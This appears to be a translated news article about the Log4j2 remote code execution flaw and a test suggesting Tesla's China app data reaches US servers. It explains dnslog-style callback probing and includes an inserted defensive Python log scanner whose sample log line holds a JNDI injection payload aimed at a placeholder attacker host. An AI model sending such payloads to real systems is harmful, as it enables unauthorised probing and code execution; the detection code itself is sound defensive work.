
"Nuclear bomb-level vulnerability" wakes us up: is Chinese Tesla owners' data stored in the United States?


This past weekend, programmers were busy.

Everyone was working overtime to patch the same vulnerability.

Apache Log4j is a Java-based logging component. Apache Log4j2 is an upgraded version of Log4j that introduces a wealth of new features by rewriting Log4j. This logging component is widely used in business system development to record program input and output in logs.

On November 24, 2021, the Alibaba Cloud security team officially reported the Apache Log4j2 remote code execution vulnerability to Apache. Because the Log4j2 component has a JNDI injection defect when processing log messages, an unauthenticated attacker can exploit it by sending specially crafted malicious data to the target server, triggering the Log4j2 component's parsing defect, achieving arbitrary code execution on the target server and obtaining the target server's permissions.

The CNVD's overall rating for the vulnerability is "high risk".

This is the National Internet Emergency Response Center's description of the vulnerability.

This description may still be too complicated for non-programmers. "Translated" simply, it means that only a single string is needed, with no password or authentication, to reach any server that uses the Log4j2 Java library, and even to run your own code directly inside it.

In a way, it is as if anyone could obtain a master key, enter any "home" that uses Log4j2, and what they do next depends only on the "thief".

The magnitude of the problem is already clear. Because the Java library Log4j2 is so popular, the vulnerability was quickly dubbed a "nuclear bomb-level vulnerability" and "the biggest vulnerability in the history of modern computing".

"Almost every Internet company you can think of is using it."

Moreover, this vulnerability is also a "zero-day vulnerability". That is to say, attacks exploiting the vulnerability are already happening at the same time as it is discovered. Compared with attacks on vulnerabilities that have already been patched, the attack methods and potential harm of such a zero-day vulnerability are unknown, which leaves the defender in the open and the attacker in the dark, able to see your every move.

As the emergency response center said, the vulnerability was reported to the authorities as early as the end of November. But before the patch arrived, things got serious: Minecraft, one of the most popular games, suffered a massive attack on December 9 that exploited the vulnerability, and many servers of this Microsoft-owned game were shut down.

More developers became aware of the seriousness of the problem: Apple, Amazon, Steam, Tencent, and 321,094 packages from 60,644 open-source projects on GitHub are on the list.

And according to Apache, Log4j2 is used as an open-source component in many different systems, making it impossible to track how much code uses it.

All the Internet companies panicked. Since last Friday, "almost all programmers have been fixing Log4j2."

And "attacks" based on the published vulnerability information increased instantly. Internet security agencies have documented a large number of attacks beginning on December 10, including not only malicious hacking but also many "studies": attempts to further understand the vulnerability's security impact on themselves and on some well-known companies. Many people typed the relevant vulnerability strings into the login or search boxes of the most basic services such as Baidu and Google, hoping to catch a glimpse of the outcome.

The nature of this vulnerability means that it is like a lever that can lift some of the veils companies usually keep firmly drawn and let you look inside, so that some unexpected "secondary disasters" arrive before the more pernicious data breaches have occurred.

While the security community was boiling over, discussing how to fix it quickly and constantly testing which companies were affected, a test of Tesla brought up an unexpected new problem.

On December 13, an Internet security practitioner posted several screenshots on Weibo, with the text:

Tesla still sent the data back to the United States.

According to these screenshots, the poster tested the vulnerability against the Tesla mobile app, and the IP addresses of Tesla servers were quickly exposed; a lookup of these IP addresses showed that the servers belonged to the United States.

"All the data generated by all the Chinese business is stored entirely in China," Tesla CEO Elon Musk said. Musk said this in September, but the glimpse offered by the vulnerability seems to tell another story.

So what do these screenshots illustrate?


Let's simplify this test to a level that most people can understand. (This loses some rigor; for example, the "opening a web page" mentioned below is actually a simplified description of a DNS lookup, but it makes the process more intuitive.)

To do this test, you first need a website such as dnslog.cn or ceye.io. Such a site provides two functions. First, it generates a second-level domain name, that is, a web address. Second, when you send this address to someone else and they open it on a phone, computer or other device, you receive feedback on the site, which at minimum includes the time of the access and the IP address.

In theory, this "someone else" could be your next-door neighbour or Tesla, but normally Tesla's servers have no reason to open an address you sent, unless you can force them to. That is exactly the danger of the Log4j2 vulnerability: when this specific test statement is added to the address, a Tesla software system that uses the Log4j2 component in its code will automatically open it "involuntarily", and the traces are then returned to the sender.
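The mechanism described above, a lookup string embedded in an ordinary request field that the logging component resolves by itself, is also what a defender looks for in server logs. The following Python scanner is an added illustration from the defender's side, not code from the original article or from any vendor: it flags log lines containing Log4j2 lookup syntax, rates a "jndi:" lookup as high severity and any other "${...:}" lookup as medium, and extracts the callback host so it can be blocked or investigated. The log lines, IP addresses and the callback domain are constructed for this example; the ".invalid" domain is a placeholder that can never resolve.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample access-log lines (not taken from the article). Line 2
# carries a JNDI lookup in its User-Agent field; line 3 carries a harmless
# looking but still untrusted "${env:...}" lookup in a query string.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:03:12:41 +0000] "GET /api/v1/vehicles HTTP/1.1" 200 512 "-" "MobileApp/4.2 (iPhone)"
198.51.100.9 - - [10/Dec/2021:03:12:44 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://attacker-callback.invalid/a}"
203.0.113.8 - - [10/Dec/2021:03:13:02 +0000] "POST /search HTTP/1.1" 200 310 "-" "Mozilla/5.0 q=${env:HOME}"
"""

# Log4j2 resolves "${prefix:...}" lookups inside logged messages, so any lookup
# syntax arriving from a client is suspicious; the "jndi:" prefix is the
# trigger for the vulnerability the article describes.
LOOKUP_RE = re.compile(r"\$\{[^}]*:")
JNDI_RE = re.compile(r"\$\{[^}]*jndi:", re.IGNORECASE)
# Host part of a jndi:<scheme>://<host>... reference, e.g. the callback domain.
JNDI_HOST_RE = re.compile(r"jndi:[a-z]+://([^/}:]+)", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    source_ip: str
    severity: str  # "high" for jndi lookups, "medium" for other lookup syntax
    snippet: str   # the lookup text itself, for the analyst


def classify(line: str) -> Optional[str]:
    """Return a severity for a log line, or None if it contains no lookup syntax."""
    if JNDI_RE.search(line):
        return "high"
    if LOOKUP_RE.search(line):
        return "medium"
    return None


def scan_log(text: str) -> List[Finding]:
    """Scan combined-format access log text and return one Finding per suspicious line."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        severity = classify(line)
        if severity is None:
            continue
        source_ip = line.split(" ", 1)[0]  # first field of the combined log format
        match = LOOKUP_RE.search(line)
        snippet = line[match.start():match.start() + 60]
        findings.append(Finding(line_no, source_ip, severity, snippet))
    return findings


def callback_hosts(text: str) -> List[str]:
    """Collect the distinct hosts referenced by jndi lookups, in order of first appearance."""
    hosts: List[str] = []
    for line in text.splitlines():
        for host in JNDI_HOST_RE.findall(line):
            if host not in hosts:
                hosts.append(host)
    return hosts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no} [{f.severity}] from {f.source_ip}: {f.snippet}")
    print("callback hosts to investigate:", callback_hosts(SAMPLE_LOG))
```

The scanner is a triage aid: a hit tells you which source addresses sent lookup strings and which hosts they pointed at, which is what you need to check egress logs for an outbound DNS or LDAP connection and to confirm whether the application actually resolved the lookup. It does not replace patching the library itself.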

In the same way, you can test Apple, Amazon or any other website for the vulnerability. To use an analogy:

Suppose there are three children in front of me (three different companies), labeled A, B and C, each holding a match. Two of the matches are damp and cannot be used, and one is normal and can be lit (a combustible match means there is a vulnerability). To find out whose match is combustible (which company has the vulnerability), I find three firecrackers labeled a, b and c.

I give a to child A, b to B and c to C, and ask them to light their firecrackers.

After a while, a firecracker goes off, and if you look closely you can see that the debris is from firecracker b, which proves that the match in child B's hand is combustible (has the vulnerability).

As mentioned earlier, after this vulnerability received widespread attention, a large number of such "firecrackers" started going off, and this Weibo post recorded a similar test. But the test not only showed that Tesla had the vulnerability and really did open such a "phishing" URL; the server address exposed as a result revealed more information:

When the tester took the IP address obtained by logging into Tesla's system in China and looked it up on whatsmyip (an IP lookup website), the ASN home location shown for the IP address was in the United States, including Washington, New Jersey and Iowa.


One of the IP addresses shows the association to Washington.

There was an uproar.

The importance of the Tesla app for this smart electric car is self-evident.

Tesla owners often rely on the mobile app to manage their cars. In May last year, a number of car owners in China reported that, because of a large-scale outage of the Tesla app, their phones could not be associated with the vehicle, which in turn made the phone key invalid, vehicle information unavailable, and the car's central control screen and dashboard impossible to activate.

Chinese Tesla owners' personal information, including driving and purchasing behaviour, is almost entirely entered in the mobile app. After the Sentry Mode upgrade in October this year, the phone can already view the car camera's feed in real time. Tesla's statement at the time was that the live camera feed would be end-to-end encrypted and inaccessible to Tesla.

The integration of the mobile app, including real-time in-car content, is undoubtedly an increasingly sensitive area. A large amount of Chinese car owners' sensitive information accumulates in the mobile app. Now, the screenshots show that the server the app connects to points to the United States.

However, just below this Weibo post, many different interpretations also emerged. How serious a data security problem this information demonstrates is not a matter of "consensus". Especially in computer security, where smart people gather, different people read this conclusion differently.

Some argue that this is just routine operation. "It doesn't have to be data transfer; it may be that some interface is being called," someone commented.

A data security person gave a more general example:

"For example, if Tencent wants to count how many QQ users around the world are online at the same time, it will also count the US users, right? But in that case what is transmitted from the United States to China is just a statistic of the number of people online, not involving users' personal information. In that case, if you say that China's Tencent is collecting US data, you are right, and if you say it is not, that's not wrong either."

Specifically for Tesla, or for Apple and other companies in a similar situation, whether it only called a service interface on the US server, or whether users' personal information was really transmitted, is the key to judging whether this flow of information is appropriate.

"This does not prove that other personal information, such as address books, text messages and photos, also reached the United States. And whether the personal information collected by the other party is encrypted in transmission and storage, and whether it complies with the data security lifecycle requirements of relevant laws and regulations, cannot be judged from the current information," some security practitioners said.

In addition to this, the server address and database address are not necessarily in the same place.

Companies generally don't do this because cross-ocean communication increases latency, but where there is no real-time requirement, such as data backups, it is possible for servers and databases to be placed in both countries, another developer said.

Obviously, people are being very cautious about this. However, it is a fact that, from these screenshots and operations, a vulnerability test statement containing the domain name was indeed transmitted from China back to the US server. A blogger verified as a senior security expert at Ant said that from this screenshot, other data is not known, but the vehicle name data is definitely transmitted back to the United States.

At the very least, the owner's vehicle name data was transmitted back to the United States, and it is unknown what the reason behind this was.

This obviously puts Tesla China in a very sensitive and confusing situation. A vulnerability test has once again made people realize that how the data localization in China claimed by Tesla and Tesla China is actually carried out, what data still needs to go through the United States, and in what form, are questions to which perhaps even Tesla's Chinese owners do not yet know the answers.

The Personal Information Protection Law, which came into effect in November 2021, stipulates:

Article 39: Where personal information processors provide personal information outside the territory of the People's Republic of China, they shall inform individuals of matters such as the overseas recipient's name, contact information, purpose of processing, method of processing, the types of personal information involved, and the methods and procedures for individuals to exercise their rights under this Law with the overseas recipient, and shall obtain the individual's separate consent.

In addition, many developers said the test released on December 13 also shows that, while the world began working overtime to close this vulnerability on the 10th, Tesla did not seem to have begun dealing with it until the 13th. Some foreign media quoted the relevant person in charge at the well-known firm Fortress Information Security as saying that the Internet as a whole is far from finished repairing this vulnerability.

"But look at the calendar: what's in two weeks? The Christmas holidays."


On December 14, Musk took his son to a Time celebration. He had previously been selected by Time as this year's Person of the Year.

"Since Apache Log4j2 is widely used in the secondary development of framework components and software and hardware products, the CNVD platform recommends that each vendor actively self-examine the software and hardware products and services it has developed, focusing on checking references to Apache Log4j2 components, and if it is found to be affected by this vulnerability, fix it immediately and notify product users to update in time." On December 13, the National Internet Emergency Response Center also issued an announcement recommending that manufacturers promptly check themselves and notify users.

The chaos caused by this vulnerability will continue for some time, and more "secondary" information may be disclosed because of it. It should be noted that some Internet security practitioners said they do not recommend casually trying this vulnerability code on major websites, because this may have unnecessary bad effects and also put the operators themselves at risk.

· The copyright of the article belongs to Pin Play and may not be reproduced without authorization.
